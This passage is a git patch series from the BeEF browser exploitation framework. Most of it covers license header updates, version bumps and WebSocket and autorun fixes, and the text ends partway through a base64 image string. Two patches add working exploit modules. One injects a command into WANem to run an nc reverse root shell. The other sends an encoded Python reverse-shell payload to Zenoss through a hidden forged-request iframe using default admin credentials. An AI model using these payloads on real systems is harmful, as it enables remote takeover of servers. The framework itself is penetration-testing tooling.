index 9fb382db4..4047325e3 100755
--- a/modules/host/get_physical_location/command.js
+++ b/modules/host/get_physical_location/command.js
@@ -1,18 +1,9 @@
-//
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
     var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
     var applet_id = '<%= @applet_id %>';
diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml
index afbb27215..49f7b48b2 100755
--- a/modules/host/get_physical_location/config.yaml
+++ b/modules/host/get_physical_location/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 beef:
     module:
         get_physical_location:
diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb
index 17f4723fb..7136a52e4 100755
--- a/modules/host/get_physical_location/module.rb
+++ b/modules/host/get_physical_location/module.rb
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 require 'rubygems'
 require 'json'
 require 'open-uri'
diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js
index 54aec9505..350d70552 100644
--- a/modules/host/get_wireless_keys/command.js
+++ b/modules/host/get_wireless_keys/command.js
@@ -1,18 +1,9 @@
-//
-//   Copyright 2011 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
     var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
     var applet_id = '<%= @applet_id %>';
diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml
index 6bf1f7159..834c47a50 100644
--- a/modules/host/get_wireless_keys/config.yaml
+++ b/modules/host/get_wireless_keys/config.yaml
@@ -1,18 +1,9 @@
 #
-#   Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
+
 beef:
     module:
         get_wireless_keys:
diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js
index 148b64eb0..9e64a64e4 100644
--- a/modules/persistence/man_in_the_browser/command.js
+++ b/modules/persistence/man_in_the_browser/command.js
@@ -1,17 +1,8 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
 
 beef.execute(function() {
 	try{
diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js
index 470ab3638..c5791aff7 100644
--- a/modules/phonegap/phonegap_check_connection/command.js
+++ b/modules/phonegap/phonegap_check_connection/command.js
@@ -1,17 +1,9 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
     var connection_type;
 
diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js
index 39bb9ed7e..65df0464d 100644
--- a/modules/phonegap/phonegap_persist_resume/command.js
+++ b/modules/phonegap/phonegap_persist_resume/command.js
@@ -1,17 +1,8 @@
-//
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
 
 //
 // persist on over app's sleep/wake events
diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js
index 14269606f..522102be3 100644
--- a/modules/social_engineering/clickjacking/command.js
+++ b/modules/social_engineering/clickjacking/command.js
@@ -1,16 +1,9 @@
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
-//
+/*
+ * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+ * Browser Exploitation Framework (BeEF) - http://beefproject.com
+ * See the file 'doc/COPYING' for copying permission
+ */
+
 beef.execute(function() {
 	var elems = {
 		outerFrame: "cjFrame",
diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml
index 8243cf0dc..c319b36c8 100644
--- a/modules/social_engineering/clickjacking/config.yaml
+++ b/modules/social_engineering/clickjacking/config.yaml
@@ -1,15 +1,7 @@
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 
 beef:
diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb
index 653329eb0..575e97d69 100644
--- a/modules/social_engineering/clickjacking/module.rb
+++ b/modules/social_engineering/clickjacking/module.rb
@@ -1,17 +1,9 @@
 #
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
-#
+
 class Clickjacking < BeEF::Core::Command
 
 	def self.options

From 014aa3c4bda51dfa165229fb11044c4fc1458897 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Fri, 2 Nov 2012 18:26:04 +1030
Subject: [PATCH 096/397] Version updated to 0.4.3.9-alpha

your changes. Lines starting
---
 VERSION     | 2 +-
 config.yaml | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/VERSION b/VERSION
index 93f3d13ce..b4a0a0eda 100644
--- a/VERSION
+++ b/VERSION
@@ -4,4 +4,4 @@
 # See the file 'doc/COPYING' for copying permission
 #
 
-0.4.3.8-alpha
+0.4.3.9-alpha
diff --git a/config.yaml b/config.yaml
index c0e5d4ea0..2e1280a37 100644
--- a/config.yaml
+++ b/config.yaml
@@ -6,7 +6,7 @@
 # BeEF Configuration file
 
 beef:
-    version: '0.4.3.8-alpha'
+    version: '0.4.3.9-alpha'
     debug: false
 
     restrictions:

From f5b4a413f64b9461166c429786c13146dead194a Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 4 Nov 2012 17:37:42 +1030
Subject: [PATCH 097/397] Added WAN Emulator command execution exploit

---
 .../wanem_command_execution/command.js        | 24 +++++++++++++++++
 .../wanem_command_execution/config.yaml       | 18 +++++++++++++
 .../wanem_command_execution/module.rb         | 27 +++++++++++++++++++
 3 files changed, 69 insertions(+)
 create mode 100644 modules/exploits/wanem_command_execution/command.js
 create mode 100644 modules/exploits/wanem_command_execution/config.yaml
 create mode 100644 modules/exploits/wanem_command_execution/module.rb

diff --git a/modules/exploits/wanem_command_execution/command.js b/modules/exploits/wanem_command_execution/command.js
new file mode 100644
index 000000000..7f6fe06e6
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/command.js
@@ -0,0 +1,24 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+
+  var wanem_iframe = beef.dom.createInvisibleIframe();
+  wanem_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/WANem/result.php?pc=127.0.0.1;/UNIONFS/home/perc/dosu%20{nc,'+lhost+','+lport+',-e,/bin/sh}%26');
+
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  cleanup = function() {
+    document.body.removeChild(wanem_iframe);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/wanem_command_execution/config.yaml b/modules/exploits/wanem_command_execution/config.yaml
new file mode 100644
index 000000000..42660a410
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
+################################################################################
+beef:
+    module:
+        wanem_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "WAN Emulator Command Execution"
+            description: "Attempts to get a reverse root shell on a WAN Emulator server.<br/>Tested on version 2.3 however other versions are likely to be vulnerable."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb
new file mode 100644
index 000000000..577fbfaf3
--- /dev/null
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -0,0 +1,27 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://support.freenas.org/ticket/1788
+################################################################################
+class Wanem_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, 
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From bbf7143a9afaec5c0b61b2f040e12c5dce0d9b3b Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Mon, 5 Nov 2012 19:32:34 +0000
Subject: [PATCH 098/397] Modified Autorun to work with modules with
 USER_NOTIFY target. Also added a few config options in the main config.yaml.

---
 config.yaml                          |  7 +++++++
 core/main/handlers/browserdetails.rb | 30 ++++++++++++++++++----------
 2 files changed, 26 insertions(+), 11 deletions(-)

diff --git a/config.yaml b/config.yaml
index 2e1280a37..29d68f633 100644
--- a/config.yaml
+++ b/config.yaml
@@ -72,6 +72,13 @@ beef:
         user:   "beef"
         passwd: "beef"
 
+    # Autorun modules as soon the browser is hooked.
+    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    autorun:
+        enable: true
+        # set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
+        allow_user_notify: true
+
     crypto_default_value_length: 80
 
     # You may override default extension configuration parameters here
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 60b059f3f..082892f92 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -24,6 +24,8 @@ module BeEF
         end
 
         def setup()
+          config = BeEF::Core::Configuration.instance
+
           # validate hook session value
           session_id = get_param(@data, 'beefhook')
           (self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -273,19 +275,25 @@ module BeEF
 
 
           # Call autorun modules
-          autorun = []
-          BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
-            if v.has_key?('autorun') and v['autorun'] == true
-              if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
-                BeEF::Module.execute(k, session_id)
-                autorun.push(k)
-              else
-                print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
+          if config.get('beef.autorun.enable')
+            autorun = []
+            BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
+              if v.has_key?('autorun') and v['autorun'] == true
+                target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
+                if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
+                  BeEF::Module.execute(k, session_id)
+                  autorun.push(k)
+                else
+                  print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
+                end
               end
+            }
+            if autorun.length > 0
+              print_info "Autorun executed[#{autorun.join(', ')}] against Hooked browser [id:#{zombie.id}, ip:#{zombie.ip}, type:#{browser_name}-#{browser_version}, os:#{os_name}]"
             end
-          }
-          if autorun.length > 0
-            print_info "Autorun executed: #{autorun.join(', ')} against Hooked browser #{zombie.ip}"
           end
         end
 

From 05e31fd2506ec8f2698ef7869148d93b3ed299f9 Mon Sep 17 00:00:00 2001
From: bcoles <bcoles@gmail.com>
Date: Sun, 11 Nov 2012 21:40:50 +1030
Subject: [PATCH 099/397] Add Zenoss 3.x command execution exploit

---
 .../wanem_command_execution/module.rb         |  2 +-
 .../zenoss_3x_command_execution/command.js    | 34 +++++++++++++++++++
 .../zenoss_3x_command_execution/config.yaml   | 18 ++++++++++
 .../zenoss_3x_command_execution/module.rb     | 29 ++++++++++++++++
 4 files changed, 82 insertions(+), 1 deletion(-)
 create mode 100644 modules/exploits/zenoss_3x_command_execution/command.js
 create mode 100644 modules/exploits/zenoss_3x_command_execution/config.yaml
 create mode 100644 modules/exploits/zenoss_3x_command_execution/module.rb

diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb
index 577fbfaf3..ca8d01c1b 100644
--- a/modules/exploits/wanem_command_execution/module.rb
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -4,7 +4,7 @@
 # See the file 'doc/COPYING' for copying permission
 #
 ################################################################################
-# For more information see: http://support.freenas.org/ticket/1788
+# For more information see:  http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
 ################################################################################
 class Wanem_command_execution < BeEF::Core::Command
 
diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js
new file mode 100644
index 000000000..087133372
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var user  = '<%= @user  %>';
+  var pass  = '<%= @pass  %>';
+  var target  = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'
+
+  // reverse python payload
+  var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')
+
+  // send request
+  var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [
+    {'type':'hidden', 'name':'__ac_name',     'value':user},
+    {'type':'hidden', 'name':'__ac_password', 'value':pass},
+    {'type':'hidden', 'name':'daemon',        'value':payload}
+  ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  // clean up
+  cleanup = function() {
+    document.body.removeChild(zenoss_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml
new file mode 100644
index 000000000..5786425da
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+beef:
+    module:
+        zenoss_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss 3.x Command Execution"
+            description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb
new file mode 100644
index 000000000..c79f60193
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+class Zenoss_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+			{ 'name' => 'user',  'ui_label' => 'Username',    'value' => 'admin'},
+			{ 'name' => 'pass',  'ui_label' => 'Password',    'value' => 'zenoss'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end

From 81f03f0024ed25db5f3e1eadd9c84eb68ec8354f Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 18 Nov 2012 15:45:46 +0000
Subject: [PATCH 100/397] Fixed a nasty bug with WebSockets. BrowserDetails are
 now always sent with XHR-polling, before switching protocols using
 WebSockets.

---
 core/main/client/net.js              | 13 ++++++-------
 core/main/handlers/browserdetails.rb |  1 +
 2 files changed, 7 insertions(+), 7 deletions(-)

diff --git a/core/main/client/net.js b/core/main/client/net.js
index 35e46615f..90cb284b6 100644
--- a/core/main/client/net.js
+++ b/core/main/client/net.js
@@ -76,22 +76,21 @@ beef.net = {
         }
     },
 
-    //Queues the current command and flushes the queue straight away
+    // Queues the current command and flushes the queue straight away.
+    // Always send Browser Fingerprinting results (beef.net.browser_details(); -> /init handler) using normal XHR-polling.
     send:function (handler, cid, results, callback) {
-        if (typeof beef.websocket === "undefined") {
+        if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
             this.queue(handler, cid, results, callback);
             this.flush();
-        }
-        else {
+        }else {
             try {
                 beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
                     '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
                     '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
-            }
-            catch (e) {
+            }catch (e) {
                 this.queue(handler, cid, results, callback);
                 this.flush();
-                }
+            }
         }
     },
 
diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb
index 082892f92..79c086330 100644
--- a/core/main/handlers/browserdetails.rb
+++ b/core/main/handlers/browserdetails.rb
@@ -24,6 +24,7 @@ module BeEF
         end
 
         def setup()
+          print_debug "[INIT] Processing Browser Details..."
           config = BeEF::Core::Configuration.instance
 
           # validate hook session value

From 6e44d5c641a1f18e3c7945f27abfef025ce102c1 Mon Sep 17 00:00:00 2001
From: Jean-Louis Huynen <huynenjl@gmail.com>
Date: Mon, 19 Nov 2012 11:14:24 +0100
Subject: [PATCH 101/397] remove hardcoded linked image to an inline one in
 credential.js template- (this template need some work btw)

---
 .../social_engineering/simple_hijacker/templates/credential.js  | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/social_engineering/simple_hijacker/templates/credential.js b/modules/social_engineering/simple_hijacker/templates/credential.js
index e18a21a62..da46794fe 100644
--- a/modules/social_engineering/simple_hijacker/templates/credential.js
+++ b/modules/social_engineering/simple_hijacker/templates/credential.js
@@ -4,7 +4,7 @@
  * See the file 'doc/COPYING' for copying permission
  */
 
-	imgr = "http://0.0.0.0:3000/ui/media/images/beef.png";
+	imgr = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAACVCAYAAAAdSLW3AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAMT1JREFUeNrsXQd8VFX2/qZkUiaFhCQkoYTeIfQuSBNBelMsiGt3resWd9VddV1d9Y+sgrordkVAadJ7M6GDdEJogRCSEEJ6JpmZzPzPue9NSK+TMIF7/F1JZt5MZt673zvnO1Wvb9ACUopID1rTab0iT4UUrTwFJWQyrb/Q6i9PhRQJkKJioDVJ/fltWm7ylEiASLkhvWi1t9vt/PMwWk/LUyIBIuWGDOBzotNoYbdaAQ3eUDmJFAkQKSSdrbl5ePjBaWjRohmsZos/PfYJLW95aiRApADNkJuLu4YPxmt/eREgsJD0o/WBPDUSIFKAEP5fjsmEhx+YipGjR8CamcWm1lP08Mvy9EiA3O6ih0aD1NR08cunH72D0GZNYDUJTfI+rZnyFEmA3M6SBa0WF+PixS+tWzbHJwQSrU4Lq9XK5+ozWmPlaZIAuV3lCnQ6HDtxquCBSePuxr/e+itgNsNms3nRQ4tojZOnSgLkdpSzcNPjZPRZJCYlFzz4yh+ewQsvPg1bVjbsdrtRBcmD8nTd+qLTevjLs3BDwjRa7YSM66m4Y1A/tG/bquCJUSOHIDk9E/t27gaByE2j0UykhzNo7ZGnTQLkdhETbfxHbbl5btC7YerEMQVPaOi/MXcNRUpmFvYSSOw6HWFJezc9FUhrMy2bPH0SILe6XKN1t02na3aZiPqUifegYUCDGyDRKCDRe3lg25YdxEnsROB1faAkNm6hlSlPoQTIrS4BpBnuyiEzy8vXByOG3lHigMED+6JVm5bYtHkHcomXaN3cWtLD99E6KXiMFEnSb2H5iVYKvDwx/8sFOH3mXKkHPXjvJGxaswgdu3aENSOTyXtjengNrXdpecjTKDXIrSpMvJuQFumbTVokLTsHk8ePLvXAJo1Dce+U8UhIuY4jBw7DZrdrtHrdIChu4CO0LsvTKQFyKwqbSQ/BTe9x5OgJ9O4ZgbatW5Z6oBdpmsnj70az8KbYvfcgspJToDEYQoivcNSdkxz30jLLUyoBcivJdd77tMmH2MwWHDx8DNMmj4O30avMF3SP6Iypk8YiNiERp46cIG1C51avGwilQpFD89HytEqA3ErCJtJErZs+MDkuHompaUJTlCf+Dfxw39TxCG/ZHPsOHkFG0lXAzS2QgHYvPd2b1glaSfLUSoDcCpJL6yKtGWQyCY4RGByIPr26VfjC7l07Yca0icjMy8NR0j5WUy40bvq2BJSH6ekgFXxZ8hRLgNR3iaEVTBu7t02rwfYdu9Cnd3e0ahFe4Qt9fIwYN3qEiMjHxF7CpTPn2exyI7OL60tmFtJSFnmaXVc0su1PhcJEexutXtbcX